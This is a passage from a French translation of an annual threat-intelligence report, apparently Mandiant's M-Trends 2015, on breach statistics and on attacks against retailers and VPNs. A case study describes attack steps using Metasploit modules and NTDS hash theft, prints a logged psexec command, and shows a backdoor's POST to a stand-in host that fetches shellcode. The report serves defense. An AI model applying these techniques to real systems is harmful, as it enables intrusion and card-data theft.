Analyses, décryptages, statistiques et études de cas : ce rapport annuel sur les menaces revient sur l'évolution des outils et tactiques mis en œuvre par les auteurs de menaces APT.
3. www.mandiant.com 1
INTRODUCTION
Depuis des années, nous ne cessons de répéter que la sécurité
parfaite n’existe pas. Les événements de 2014 devraient nous
donner raison une bonne fois pour toutes.
M
algré quelques modestes progrès
dans les capacités des entreprises à
renforcer leur sécurité, les auteurs
d’attaques avancées (ou non) continuent de
trouver les moyens de contourner les dispositifs
de sécurité en place.
Dans le rapport M-Trends de l’an passé, nous
remarquions que la cybersécurité était passée
d’une problématique informatique isolée à une
priorité absolue pour les instances dirigeantes
des entreprises. Cette année, la cybersécurité,
ou plutôt la « cyberinsécurité », a pris le devant
de la scène. Pour les seules premières semaines
de 2015, la question s’est invitée tour à tour
dans le discours du président américain sur l’état
de l’Union1
, dans l’intrigue d’un film à gros
budget2
et dans l’allocution d’ouverture de la
cérémonie des Golden Globe Awards.3
En tant que premier intervenant sur des
incidents de sécurité critiques, Mandiant a
acquis une perspective unique sur les modes
opératoires et les motivations des attaquants.
Les analyses et éclairages livrés dans ce
document sont le fruit d’une expérience cumulée
au cours de centaines de missions sur le terrain.
Au cours des dix dernières années, nous sommes
intervenus aux côtés de clients dans plus de
30 secteurs d’activité à travers le monde.
Malgré une amélioration certaine dans les
systèmes de détection des entreprises, les
pirates ont encore pu agir trop longtemps avant
d’être détectés, soit en moyenne 205 jours en
2014 contre 229 jours en 2013. Dans le même
temps, le nombre d’entreprises ayant découvert
elles-mêmes ce type d’intrusion est resté
globalement stable. En 2014, 69 % des
structures victimes d’une compromission de
sécurité en ont été alertées par des entités
externes, notamment les services de police. Ce
chiffre traduit une légère hausse par rapport à
2013 (67 %) et 2012 (63 %)
Le commerce et la grande distribution sont
restés des cibles privilégiées, à l’heure où les
attaquants déploient de nouvelles méthodes
pour exfiltrer les numéros de carte des systèmes
de paiement en magasin. Dans le domaine des
cartes bancaires à puce avec code PIN, nous
avons observé une recrudescence des attaques
à l’encontre des sites e-commerce et des
prestataires de traitement des paiements.
Par ailleurs, certaines branches d’activité dans
lesquelles nous étions jusqu’alors peu interve
nus se sont trouvées en ligne de mire : Services
aux entreprises, santé, organismes publics et
organisations internationales.
Dès que les équipes de sécurité déploient de
nouvelles lignes de défense, les pirates changent
de tactique. L’an passé, cette dynamique s’est
développée à grande échelle, sous nos yeux.
Aussi avons-nous pu observer les nouvelles
méthodes (ou parfois des méthodes éprouvées
remises au goût du jour) employées par les
attaquants pour infiltrer les réseaux privés
virtuels (VPN), échapper à toute détection,
dérober des identifiants de connexion et
maintenir une présence furtive et persistante
dans les environnements compromis.
L’année 2014 fut également marquée par une
hausse des déclarations publiques d’incidents de
sécurité par les victimes elles-mêmes. Pour
autant, ces dernières restent plus que jamais
dans le flou sur une question essentielle : qui
m’attaque ? D’autant que la frontière tend à
s’estomper entre les cybercriminels ordinaires
et les groupes à la solde d’États, à mesure que
les premiers haussent leur niveau de jeu et que
les seconds utilisent des kits d’attaque clé-en-
main pour brouiller les pistes.
Ensemble, ces développements dépeignent un
tableau des menaces plus complexe que jamais.
Dans ce contexte, jamais la mission des équipes
de sécurité n’a été aussi difficile – et cruciale –
pour prévenir, détecter, analyser et réagir aux
attaques.
1
Michael D. Shear (The New York Times). “Obama to Announce Cybersecurity Plans in State of the Union Preview.” Janvier 2015.
2
Sheri Linden (The Hollywood Reporter). “’Blackhat’: Film Review.” Janvier 2015.
3
Christopher Palmeri (Bloomberg). “Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes.” Janvier 2015.
4. 2 www.mandiant.com
Les nouvelles du frontM-Trends
Plusieurs secteurs dans lesquels nous avions
jusqu’alors peu enquêté sont apparus comme
de nouvelles cibles privilégiées :
Services aux entreprises
Organismes publics et organisations
internationales
Santé
6 %
Santé
5 %
Transports
3 %
Aérospatiale
et défense
7 %
Services
juridiques
8 %
Autre
7 %
High-tech et
informatique
8 %
Construction et ingénierie
17 %
Services aux entreprises
7 %
Organismes publics et
organisations internationales
14 %
Commerce et distribution
10 %
Services financiers
3%
8 %
Médias et divertissements
5%
En 2014, nous avons observé des variations du nombre
de nos interventions dans certains domaines :
Commerce et distribution — de 4 % à 14 %
Médias et divertissements — de 13 % à 8 %
Secteurs d’activité dans lesquels Mandiant a enquêté sur des intrusions
LES CHIFFRES CLÉS
Un large éventail d’industries a été pris pour cible en 2014, y compris dans des
branches autrefois relativement épargnées. De même, bien que les entreprises aient
été plus promptes à découvrir une compromission qu’en 2013, elles ont encore laissé
beaucoup trop de temps aux attaquants pour agir incognito. Pire encore, elles ont été
moins nombreuses que les années précédentes à découvrir l’intrusion par leurs
propres moyens.
5. www.mandiant.com 3
Le phishing, vecteur d’APT
des e-mails de phishing recensés
utilisaient l’angle de l’informatique
ou de la sécurité, les attaquants se
faisant souvent passer pour un édi-
teur d’antivirus ou le département
informatique de l’entreprise ciblée
78 %
des e-mails de
phishing ont été
envoyés pendant
les jours ouvrés
de la semaine
72 %
Dim
Sam
Ven
Jeu
Mer
Mar
Lun
Des menaces très diverses
NUISANCE VOLDEDONNÉES CYBERCRIME HACKTIVISME DESTRUCTION
Objectif
Accès et
propagation
Motivations écono-
miques ou politiques
Gain financier
Diffamation,
publicité négative
Perturbation
des opérations
Exemple
Botnets
et spam
GroupesAPT(Advanced
PersistentThreat)
Vol de numéros
de cartes
Défiguration
de site
Suppression
de données
Ciblé
Caracté-
ristique
Souvent
automatisé
Persistant
Souvent
opportuniste
Forte visibilité
Motivé par
un conflit
Les attaquants exploitent les réseaux de leurs victimes dans des buts économiques et politiques de plus en plus variés.
Lapse de temps entre la première preuve
tangible d’une compromission et sa découverte
205
Nombre moyen de jours de présence
des attaquants sur le réseau de la
victime avant d’être détectés
24 jours de moins qu’en 2013
Présence la plus longue : 2 982 jours
Qui découvre la compromission ?
31 %
des victimes ont
détecté la compro-
mission en interne
69 %
ont été alertées par
une entité externe
6. 4 www.mandiant.com
Les nouvelles du frontM-Trends
TENDANCE 1 :
LE SIGNALEMENT DES ATTAQUES
INFORMATIQUES ET SES
PROBLÈMES
Plus que jamais, les incidents de sécurité propulsent les entreprises victimes sous
le feu des médias de plus en plus pressants sur les informations à communiquer.
E
n 2014, nous sommes intervenus auprès
de plus de 30 entreprises qui avaient
publiquement déclaré une compromission
de données, souvent dans le sillage tourmenté
de révélations dans les médias. D’après notre
expérience, les entreprises ont tout intérêt à
délivrer un message clair et précis, basé sur les
informations factuelles d’une analyse de la
compromission. Ce faisant, elles éviteront de
devoir faire marche-arrière sur des communi-
qués antérieurs – et de perdre toute crédibilité
au passage.
Un public sensible à la cybersécurité
Le flot apparemment incessant de compromis-
sions divulguées en 2014 a éveillé l’intérêt de
l’opinion publique aux problématiques des
attaques ciblées et de leurs impacts. En consé-
quence, les journalistes, partenaires, investis-
seurs et consommateurs ont tendance à poser
des questions plus avisées et détaillées en cas de
signalement. Ils ne se contentent plus seulement
de savoir quand l’incident a eu lieu et quelles
données ont été exposées. Ils exigent désormais
des détails qui vont du type de malware utilisé à
la méthode employée par les attaquants pour
persister sur le réseau.
Ils se montrent également plus insistants pour
savoir qui se cache derrière l’attaque. Ainsi, on
nous demande souvent d’attribuer un acte
malveillant à tel ou tel auteur dès le premier jour
de l’enquête, alors que nous commençons à
peine à rassembler les preuves. Même lorsque
l’enquête avance, il est de plus en plus difficile de
désigner des coupables avec certitude, dans la
mesure où les différents profils d’attaquants
tendent désormais à utiliser les mêmes outils
(voir « Tendance 4 : Entre cybercriminels et
groupes APT, la frontière s’estompe », en
page 20).
Rehausser le niveau
À l’heure où de plus en plus d’informations
doivent être divulguées, les entreprises victimes
prennent peu à peu conscience du caractère
crucial d’une communication de crise maitrisée
et cohérente. Au moment de rendre l’incident
La formulation d’une stratégie de communication efficace passe donc
par une bonne compréhension de la portée et de l’étendue de la compro-
mission. L’entreprise évitera ainsi de perdre toute crédibilité en revenant
sur ses déclarations passées.
7. www.mandiant.com 5
public, elles doivent souvent trancher dans le vif
sur les éléments à dévoiler — même lorsque de
nombreuses zones d’ombre subsistent.
Dans bien des cas, les entreprises doivent lutter
de toutes parts pour garder la maîtrise de la
situation. Ainsi, nous avons vu des scénarios
dans lesquels différentes spéculations sur les
modes d’infiltration des attaquants ont déclen-
ché une avalanche de démentis, alors même que
les enquêteurs tentaient de circonscrire et
neutraliser l’incident.
Dans ce genre de situation, les enquêteurs
passent leur temps à rejeter les hypothèses les
plus diverses au lieu de se concentrer sur leur
mission première : trouver des indices et faire
avancer l’enquête.
Pourquoi tant d’attaques
informatiques dans la presse ?
On nous demande souvent pourquoi les
entreprises sont de plus en plus nombreuses à
signaler les attaques informatiques dont elles
sont victimes. Bien qu’il n’existe pas de réponse
définitive, nous voyons deux éléments détermi-
nants dans cette tendance. Premièrement, par
rapport aux années précédentes, nous sommes
intervenus sur davantage de cas où des données
de cartes bancaires ou d’identification person-
nelle (PII) avaient été exposées. Or, dans bien
des cas, la loi impose maintenant aux entreprises
victimes de signaler certains aspects de tels
incidents.
Par ailleurs, dans 69 % des incidents que nous
avons traités en 2014, les victimes n’ont pas été
en mesure de détecter elles-mêmes la présence
des attaquants, n’apprenant la nouvelle que par
le biais d’une entité externe (fournisseur, client
ou autorités).
En d’autres termes : si vous découvrez l’attaque
informatique dont vous faites l’objet, il y a fort à
parier que d’autres — et pas seulement les
attaquants eux-mêmes — auront aussi eu vent
de l’incident.
Qu’elle décide ou non de rendre un incident
public, l’entreprise ne doit jamais perdre de vue
le fait que même si les principales parties pre-
nantes veulent des réponses immédiates, les
enquêtes peuvent prendre des semaines, voire
des mois avant que les faits n’émergent. D’où
l’importance capitale de bien comprendre la
portée et l’étendue de la compromission au mo-
ment de définir votre communication de crise.
À RETENIR : En divulguant les incidents de sécurité dont elles ont été
victimes, de plus en plus d’entreprises se retrouvent sous le feu de la rampe.
Médias, clients, partenaires… tous commencent à prendre conscience du fait que
les compromissions sont inévitables. Dans le même temps, ils demandent aussi plus
d’informations et de détails. Pour bien se préparer à une telle éventualité, les
entreprises doivent mettre en place une stratégie de communication efficace. Or,
les meilleures stratégies s’établissent et s’appliquent sur la base de faits tangibles,
issus d’une enquête rigoureuse.
8. 6 www.mandiant.com
Les nouvelles du frontM-Trends
MENER UNE
ENQUÊTE EFFICACE
Nous dressons ici la liste des questions que les médias, investisseurs et
clients posent inlassablement lors du signalement public d’un incident de
sécurité. Du côté des entreprises victimes, tous les intervenants devront
s’accorder sur les réponses à donner pour éviter toute imprécision ou
incohérence dans leurs déclarations publiques.
Comment les attaquants se sont-ils
infiltrés dans votre environnement ?
La recette des attaquants se compose généralement
d’un mélange d’ingénierie sociale et de vulnérabilités
inconnues ou non corrigées. Exploitation d’un serveur
Internet, envoi d’une pièce jointe paraissant légitime
par e-mail, infection d’un site Web très visité par les
publics ciblés... les tactiques varient. D’où l’importance
de bien se préparer à expliquer comment les
malfaiteurs sont parvenus à s’infiltrer. Plus capital
encore, l’entreprise devra pouvoir déclarer avec
certitude si l’accès a été bloqué et l’attaque
neutralisée.
Comment les attaquants sont-ils
parvenus à maintenir un accès à
l’environnement ?
Les attaquants ont souvent besoin d’un accès continu
à l’environnement infiltré. Pour les en déloger, vous
devrez trouver et bloquer toutes les voies d’accès
utilisées. Parmi les méthodes privilégiées, on trouve
notamment les portes dérobées (backdoors), les
webshells, les accès via le VPN et autres systèmes
de connexion à distance des entreprises.
Comment l’attaque s’est-elle déroulée ?
Bien comprendre comment des attaquants sont
parvenus à s’introduire sur le réseau et à en exfiltrer
des données est un passage obligé pour la prévention
d’une récidive. Sans un diagnostic précis de l’ampleur
de l’attaque, il est très difficile d’en mesurer l’impact
– et encore plus de l’enrayer.
Quelles données les attaquants ont-ils
dérobées ?
Seule une analyse forensique des systèmes compromis
permet généralement de répondre à cette question.
Parfois, votre propre examen n’apportera que des
éléments de réponse partiels.
Travaillez toujours au contact de votre équipe juri-
dique pour déterminer vos obligations légales en
fonction des types de données volées, que la
compromission soit supposée ou avérée.
Avez-vous neutralisé l’attaquant ?
Si vous avez pu répondre aux quatre premières
questions, celle-ci ne devrait normalement pas poser
de problème. Une bonne compréhension du déroulé
de l’attaque vous permettra de mieux la combattre et
de mieux vous en relever.
9. www.mandiant.com 7
4
U.S. Department of Homeland Security and U.S. Secret Service. “Backoff Malware: Infection Assessment.” Août 2014.
TENDANCE 2 :
LE COMMERCE ET LA
DISTRIBUTION DANS LE VISEUR
Le monde du commerce et de la distribution s’est retrouvé au centre d’attaques
qui ont touché plus de 1 000 entreprises et contraint un nombre incalculable de
consommateurs à remplacer leurs cartes bancaires en 2014.4
Mais au-delà du
volume d’attaques perpétrées, nos enquêtes ont révélé l’existence de nouveaux
groupes, kits d’outils et techniques d’attaques.
Les serveurs d’applications virtuelles
comme point d’entrée
La virtualisation d’applications permet aux
utilisateurs de se connecter à distance à des
programmes hébergés sur un poste de travail
virtuel sécurisé. Une bonne configuration de cet
environnement permet de créer une bulle de
protection dans laquelle les utilisateurs peuvent
évoluer en toute sécurité. Mais dans certains
cas, même les erreurs de configuration les plus
mineures peuvent ouvrir des brèches dans
lesquelles les attaquants ne tardent pas à
s’engouffrer pour aller rebondir sur d’autres
parties du système.
Dans toutes nos enquêtes mettant en lumière ce
vecteur d’attaque, nous avons observé la même
faille de sécurité : l’accès à distance ne s’effec
tuait que par l’utilisation d’un login et mot de
passe, soit un seul facteur d’authentification,
alors que deux facteurs auraient bloqué l’accès.
Nouveaux outils, nouvelles
tactiques, nouveaux modes
opératoires
Les nouveaux groupes d’attaques apportent
avec eux leur lot d’outils, de tactiques et de
modes opératoires. Ainsi, nous avons observé
les schémas d’attaque les plus variés, des
hackers débutants équipés d’outils largement
accessibles jusqu’aux groupes installant des
malwares sophistiqués pour la collecte de
numéros de cartes sur des terminaux de
paiement en magasin.
Toutefois, le niveau de compétences importe
peu puisque les attaquants novices se sont mon-
trés tout aussi aptes à extorquer des numéros
de cartes que des groupes plus expérimentés.
Dans tous les cas de figure, les malfaiteurs ont
pu agir en sous-marin dans l’environnement de
leurs victimes, obtenir l’accès aux terminaux de
paiement et y installer des malwares pour la
collecte des numéros de carte.
Recrudescence des attaques sur les
paiements e-commerce par carte
Les cartes à puce avec code PIN des systèmes
Europay, MasterCard et Visa (EMV) débarquent
enfin sur le marché américain. Omniprésentes
depuis des décennies à travers le monde, ces
cartes ont pourtant tardé à s’imposer dans les
enseignes outre-Atlantique.
L’une de leurs particularités est de générer un
code unique à chaque transaction, ce qui rend
leur contrefaçon plus difficile et peut
contraindre les cybercriminels à se rabattre sur
des proies plus faciles. Dans les pays qui ont
adopté la technologie EMV, nous avons noté une
augmentation de nos interventions sur des cas
de compromissions de sites e-commerce et de
prestataires de paiement.
10. 8 www.mandiant.com
Les nouvelles du frontM-Trends
ÉTUDE DE CAS
Une grande enseigne américaine victime d’une compromission de millions de
cartes de crédit sur une période de 3 mois
Le schéma d’attaque ressemble à de
nombreux autres scénarios observés
dans la grande distribution en 2014 :
accès distant au réseau de l’enseigne au
moyen d’identifiants valides, utilisation
des autorisations associées pour se
déplacer latéralement sur le réseau et
déploiement de malwares sur les
caisses des magasins. Ce n’est qu’après
avoir été alerté par les autorités
américaines que le distributeur a
découvert la compromission.
Point initial de la compro-
mission
L’attaquant s’est d’abord connecté au
serveur d’applications virtuelles au
moyen d’identifiants légitimes. Le
serveur d’applications lui a alors
accordé un droit d’accès limité à un
poste de travail virtuel. Nous n’avons
trouvé aucun échec de connexion, ce
qui indique que l’attaquant avait obtenu
ces identifiants en amont.
(Les éléments en notre possession ne
nous permettent cependant pas de
définir clairement comment il s’est
procuré ces informations.)
Il a ensuite profité d’une petite erreur
de configuration du poste de travail
virtuel pour s’octroyer un privilège
d’accès en ligne de commande,
c’est-à-dire prendre le contrôle direct
du système. Il est ensuite passé par un
site FTP Windows pour télécharger un
outil de type « password dump » qui lui
a permis d’obtenir le mot de passe du
compte administrateur local. Ce mot de
passe était le même pour tous les
systèmes de l’environnement de cette
enseigne.
Tout ceci s’est déroulé en l’espace de
quelques minutes.
Déplacement latéral
Lors de ses premières manœuvres,
l’attaquant a utilisé Metasploit pour se
déplacer latéralement dans l’environ
nement. Metasploit est un framework
open source qui sert à développer,
tester et exécuter du code d’exploit.
Son vaste choix de modules aide les
utilisateurs à trouver et exploiter des
faiblesses sur les systèmes ciblés. Cette
richesse fonctionnelle en fait un outil
prisé, tant des cybercriminels que des
chercheurs en sécurité.
En l’occurrence, l’attaquant a utilisé le
module Metasploit psexec_command,
ce qui lui a permis d’exécuter des
commandes sous forme de service
Windows sur le système compromis.
Or, cette action laisse un certain
nombre de traces dans les journaux
d’événements systèmes Windows.
Tout en maintenant son accès aux
systèmes compromis, l’attaquant s’est
ensuite tourné vers le contrôleur de
domaine du siège de l’enseigne, c’est-
à-dire le serveur qui gère l’authentifica-
tion dans l’environnement Windows.
Rien de plus facile pour lui puisque les
identifiants d’administrateur local qu’il
s’était procurés lui permettaient aussi
d’accéder au contrôleur de domaine. À
l’aide du module Metasploit ntdsgrab, il
est ensuite parvenu à obtenir une copie
de la base de données NTDS et des
registres du système.
La base NTDS stocke les informations
Active Directory utilisées par les
contrôleurs de domaine, y compris les
hashs des noms d’utilisateur et mots de
passe. Le module ntdsgrab utilise le
Service de cliché instantané des
volumes (VSS, Volume Shadow Copy
Service) de Windows pour créer un
cliché instantané de la partition qui
contient la base de données NTDS.
VSS a pour rôle de créer un snapshot
du système à des fins légitimes de
sauvegarde et de restauration. Mais
dans le cas présent, l’attaquant s’en est
servi pour créer une copie de la base
NTDS. Dès lors, il a pu recourir à
d’autres outils pour en extraire les
hashs de mots de passe.
Une fois les hashs du mot de passe de
l’administrateur de domaine craqués,
l’attaquant a pu se déplacer latérale-
ment au sein de l’environnement.
À ce stade, il est passé de Metasploit à
des techniques de déplacement latéral
plus traditionnelles, notamment les
connexions réseau non-interactives,
l’outil Microsoft SysInternals PsExec et
des connexions RDP (Remote Desktop
Protocol). Une fois connecté au serveur
d’applications virtuelles au moyen des
identifiants de l’administrateur de
domaine, l’attaquant a pu étendre son
accès en se connectant aux systèmes
via RDP.
Porte dérobée
Pour maintenir sa présence dans l’en-
vironnement compromis, l’attaquant a
installé une porte dérobée (backdoor)
sur plusieurs machines, sous la forme
d’un pilote malveillant conçu pour
cibler les systèmes Windows XP.
Le malware avait été compressé
à l’aide d’un programme ultrasophis-
tiqué, semblable à ceux que l’on trouve
sur des malwares avancés et pourtant
largement accessibles. Le pilote se
décompresse d’abord en mémoire,
avant de lancer un nouveau thread
système.
Le pilote original alerte ensuite le
système de son échec de chargement.
11. www.mandiant.com 9
Mode de fonctionnement
de psexec_command :
Le module psexec_command écrit la
commande à exécuter et le fichier de
sortie (fichier texte) dans un fichier de
commandes Windows. Les noms du
fichier texte et du fichier de commande
Windows comportent 16 caractères
générés de manière aléatoire.
psexec_command exécute ensuite le
fichier de commandes Windows créé
dans la première étape.
La figure 1 illustre l’information telle
qu’elle est inscrite dans le journal
d’événements système Windows.
Figure 1 : Installation de service via le module Metasploit psexec_command
A service was installed in the system.
Service Name: MRSWxwQmQxFGumEFsW
Service File Name: %COMSPEC% /C echo dir ^>
%SYSTEMDRIVE%WINDOWSTempTthwsVKvUhydrsNB.txt >
WINDOWSTempRbhRmgALAHcdyWXG.bat & %COMSPEC% /C
start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG.
bat
Service Type: user mode service
Service Start Type: demand start
Parce que le code est décompressé
dans un processus séparé du pilote
original, le malware est actif en dépit du
fait que Windows ne reconnaît pas le
chargement du pilote. Ces techniques
servent à entraver les efforts de
rétroingénierie et à dissimuler la
présence d’une porte dérobée.
La porte dérobée tire ses fonctionnali-
tés d’un shellcode que le pilote décom-
pressé injecte dans les processus de
l’espace utilisateur (processus qui s’exé-
cutent en dehors du noyau Windows).
Le shellcode lance une requête HTTP
POST à une adresse IP codée en dur et
télécharge un shellcode encodé en XOR
contenu dans un commentaire HTML.
Cette technique a rendu la porte
dérobée particulièrement flexible. Pour
y ajouter de nouvelles fonctionnalités, il
suffisait à l’attaquant de télécharger et
d’exécuter un nouveau shellcode. Ce
schéma d’utilisation d’un shellcode n’est
pas nouveau, mais le duo qu’il formait
avec le programme de compression en
ont fait un malware particulièrement
sophistiqué.
La figure 2 illustre le mode de commu-
nication entre le système infecté et le
serveur de commande et contrôle
(CnC).
Figure 2 : Communication par la porte dérobée
POST /evil.txt HTTP/1.0
Accept: */*
Content-Length: 32
Content-Type: application/octet-stream
User-Agent: Evil_UA_String
Host: 1.2.3.4
Pragma: no-cache
<POST_DATA>
<!-XOR_Encoded_Shellcode -->
La porte dérobée envoie une requête HTTP POST
au serveur de commande et contrôle (CnC)
Téléchargement et exécution
d’un shellcode encodé en XOR
Système
infecté
CnC du
hacker
12. 10 www.mandiant.com
Les nouvelles du frontM-Trends
Toutes les caisses de
tous les magasins de
l’enseigne s’authen-
tifiaient auprès du
contrôleur de
domaine central.
En d’autres termes,
quiconque avait accès
au contrôleur de
domaine pouvait
accéder directement
aux caisses des
magasins.
Exfiltration de données
Une fois en possession du mot de passe
administrateur du domaine, l’attaquant
a pu accéder à sa guise aux systèmes
Windows de l’environnement informa-
tique du siège de l’entreprise.
De là, il s’est attelé à obtenir l’accès à
l’environnement informatique des
magasins.
Cet environnement était configuré
comme suit :
• Le domaine des magasins avait une
relation bidirectionnelle avec le
domaine du siège.
• Les caisses des magasins étaient
sous Microsoft Windows XP.
• Les caisses étaient reliées au
domaine des magasins.
Cette configuration, très courante dans
la grande distribution, a donné deux
avantages à l’attaquant.
Premièrement, les identifiants d’admini
strateur de domaines lui ont donné des
privilèges d’accès aux systèmes du
domaine des magasins.
Deuxièmement, le domaine des maga-
sins était un domaine enfant du domaine
du siège. Aussi, pour maintenir certaines
fonctionnalités actives, plusieurs ports
critiques devaient rester ouverts en
permanence entre les contrôleurs de
domaine du siège et les magasins. Or,
ces ports ouverts contournaient toutes
les autres règles mises en place sur les
pare-feu. L’attaquant s’est donc servi de
ces ports ouverts pour accéder au
contrôleur de domaine, qui à son tour
lui a permis de s’introduire dans
l’environnement des magasins.
Toutes les caisses de tous les magasins
de l’enseigne s’authentifiaient auprès
du contrôleur de domaine central. En
d’autres termes, quiconque avait accès
au contrôleur de domaine pouvait
accéder directement aux caisses des
magasins. À l’aide d’un script de
commandes Windows sur le contrôleur
de domaine des magasins, l’attaquant a
copié le malware de collecte d’informa-
tions de cartes bancaires sur chacune
des caisses des points de vente.
Une tâche Windows planifiée lui a
ensuite permis d’activer le malware.
C’est ainsi qu’il a pu extraire des infor-
mations de la mémoire de traitement
de l’application, notamment le numéro
de compte et la date d’expiration
enregistrés sur la bande magnétique de
la carte. Ces informations peuvent
ensuite être revendues à des spécia
listes de la contrefaçon de cartes.
Le malware est passé par OSQL, un
outil de requête de ligne de commande
SQL préinstallé sur les caisses, pour
inscrire les données des cartes ban-
caires sur la base de données MSSQL
temporaire tempdb. Les données de la
table tempdb sont effacées dès l’arrêt
du service MSSQL. Une fois par jour,
l’attaquant envoyait donc une requête à
la base tempdb sur toutes les caisses
des magasins. Les données transmises
en retour étaient ensuite transférées
vers un fichier texte sur le contrôleur
de domaine.
De là, l’attaquant archivait le fichier
texte et l’envoyait à un poste de travail
connecté à Internet dans l’environne-
ment des magasins. Il ne lui restait alors
plus qu’à le charger sur un serveur sous
son contrôle via le protocole FTP.
La figure 3 retrace le déroulé de
l’attaque.
13. www.mandiant.com 11
Figure 3 : Résumé de l’attaque
L’attaquant a trouvé une brèche dans l’appli-
cation virtuelle qui lui a permis de se déplacer
latéralement au sein de l’environnement infor-
matique du siège. De là, il a pu récupérer des
identifiants de connexion sur les systèmes de
l’environnement.
2 L’attaquant s’est servi du contrôleur de
domaine des magasins comme plaque
tournante pour l’accès aux caisses dans
les points de vente. Il y a ensuite installé
un malware qui collectait les données de
cartes bancaires sur chacune de ces
caisses.
3
L’attaquant s’est infiltré à distance dans l’environnement
de l’entreprise via un serveur d’applications virtuelles. Il
s’est ensuite authentifié au moyen d’identifiants valides.
1 L’attaquant a collecté les
données de cartes ban-
caires sur les caisses des
magasins, avant de les
transférer du contrôleur
de domaine vers un poste
de travail utilisateur dans
l’environnement des maga-
sins. Les données volées
ont ensuite été exfiltrées
via FTP vers un site FTP
externe sous son contrôle.
4
Serveur
d’applications
virtuelles
Contrôleur
de domaine
du siège
Contrôleur de
domaine des
magasins
Poste de
travail
utilisateur
Accès initial Exfiltration de données via FTP
Poste de
travail
utilisateur
Caisse 1 Caisse 2
Magasin 2
Domaine des magasinsDomaine du siège
DMZ
Caisse 1 Caisse 2
Magasin 1
Trafic CnC
Attaquant
14. 12 www.mandiant.com
Les nouvelles du frontM-Trends
À RETENIR : L’argent attire le crime. De fait, la grande distribution a toujours
été dans la ligne de mire de cybercriminels motivés par l’appât du gain. L’année 2014
n’a pas dérogé à la règle. Certes, les attaquants ont encore plus fait parler d’eux
dans les médias. Mais malgré quelques nouveautés, ils ont récité une partition
globalement semblable à ce que nous avons observé ces dernières années.
Recommandations
Face à cette recrudescence d’attaques, quelle position les grandes enseignes doivent-elles adop-
ter ? D’abord, soyons clairs : il est impossible de bloquer toutes les attaques et toutes les compro-
missions. Toutefois, ces quelques recommandations pourront restreindre la capacité des atta-
quants à s’infiltrer dans votre environnement et à s’y déplacer latéralement. Avec les bons ou-
tils et une équipe de sécurité vigilante, vous pouvez ralentir la progression de l’attaque et vous
donner le temps nécessaire pour détecter, analyser et réagir avant que le pire ne se produise.
Accès distants sécurisés
Commencez par dresser un bilan des modes
d’accès distants de vos salariés, fournisseurs
et sous-traitants à votre environnement. En-
tamez un processus de contrôle de tous les
accès distants, notamment le nombre de mé-
thodes d’accès, les utilisateurs habilités et les
exigences en matière de mots de passe. Tous
les accès distants devraient être soumis à
une authentification à deux facteurs. Assu-
rez une surveillance active de toutes les
connexions distantes pour y déceler d’éven-
tuelles activités suspectes.
Accès sécurisés à l’environ
nement PCI
Séparez votre environnement PCI (Payment
Card Industry) du reste de votre réseau.
Tout accès aux systèmes dans l’environne-
ment PCI devra passer par un serveur de
rebond sécurisé, chargé de gérer les équipe-
ments au sein des zones à haute sécurité.
L’accès à ce serveur sera également soumis
à une authentification à deux facteurs.
Dans la mesure du possible, essayez de sé-
parer les domaines des magasins pour res-
treindre les connexions à d’autres environ-
nements. De même, limitez les trafics réseau
sortant à une liste de connexions approuvées
dans le cadre de vos activités.
Établissez une liste blanche
d’applications pour vos systèmes
critiques
Pour éviter l’exécution de fichiers malveillants
sur des systèmes critiques, tous ces systèmes
devront tenir à jour une liste blanche d’appli-
cations autorisées. Ce dispositif s’étendra à
tous les systèmes qui traitent des données
de cartes bancaires, les serveurs de rebond
et d’autres systèmes critiques comme les
contrôleurs de domaine.
Gestion des comptes à forts
privilèges
Administrateur local, administrateur de
domaine, comptes de service… les atta-
quants ciblent en priorité les comptes dotés
de forts privilèges. La première chose à faire
est donc d’en réduire le nombre. De même,
assurez-vous que tous les comptes admi-
nistrateurs locaux utilisent bien des mots de
passe différents. Un outil d’administration et
de protection des mots de passe vous per-
mettra de gérer des identifiants uniques et
de changer le mot de passe d’un compte
après chaque utilisation. Ces technologies
vous confèreront une plus grande maîtrise
des comptes privilégiés.
15. www.mandiant.com 13
TENDANCE 3 :
L’ÉVOLUTION DU CYCLE DE VIE
DES ATTAQUES
La majorité des incidents sur lesquels nous enquêtons suivent un schéma classique
que nous appelons « cycle de vie des attaques ».
L
es équipes de sécurité et les attaquants
semblent constamment jouer au chat et à
la souris : à peine les uns déploient-ils de
nouveaux dispositifs de défense qu’aussitôt, les
autres modifient leurs tactiques. Cette tendance
s’est poursuivie en 2014, année marquée entre
autres par une hausse des détournements des
connexions VPN visant à maintenir un accès
permanent aux environnements des entreprises
victimes. Nous avons également observé l’émer-
gence de techniques élaborées permettant d’é-
chapper aux systèmes de détection, sans oublier
de nouveaux outils et tactiques destinés à voler
des identifiants et à se déplacer latéralement
dans les environnements compromis.
Détournements des connexions VPN
L’accès au VPN d’une entreprise offre deux
avantages décisifs aux attaquants : 1) celui de
s’implanter dans un environnement sans avoir à
y installer de portes dérobées et 2) celui de se
fondre dans la masse en imitant les comporte-
ments d’utilisateurs autorisés.
Ainsi, une fois sur le réseau, les groupes d’attaque
que nous avons étudiés se sont immédiatement
tournés vers les dispositifs VPN et leurs identi-
fiants d’accès. En ce sens, 2014 fut une nouvelle
année record : jamais nous n’avions recensé
autant de cas d’accès malveillants aux VPN des
entreprises.
La plupart de nos investigations ont fait
apparaître deux grands vecteurs d’attaques des
VPN :
• Authentification à facteur unique : si
l’accès au VPN ne s’effectuait que par nom
d’utilisateur et mot de passe valides, les
attaquants n’ont eu qu’à réutiliser des iden-
tifiants récupérés dans le domaine Active
Directory ou les systèmes compromis des
utilisateurs.
• Authentification à deux facteurs basée
sur des certificats : dès lors que le
deuxième facteur d’authentification était un
certificat numérique propre à chaque
utilisateur, les attaquants se sont servis
d’outils très courants comme Mimikatz
pour extraire ces certificats des systèmes
compromis. Dans certains scénarios, le
manque de sécurité dans la distribution des
certificats VPN (pièce jointe d’e-mails
non-cryptés ou plates-formes ouvertes de
partage de fichiers) leur a facilité la tâche.
Dans des cas plus rares, les attaquants ont eu
recours à des exploits zero-day pour contourner
le processus d’authentification VPN. Nous cite-
rons évidemment « Heartbleed », une vulnéra-
bilité dans l’extension Heartbeat du protocole
TLS (Transport Layer Security) qui a fait les gros
titres en avril dernier. Cette faille permettait en
effet aux attaquants de récupérer des buffers
mémoire de 64 Ko sur les serveurs et périphé-
riques vulnérables, et ce à partir d’une simple
requête.
Au moment de la découverte de Heartbleed, l’im-
pact de cette vulnérabilité et les probabilités de
vol de données sensibles (clés de cryptage, iden-
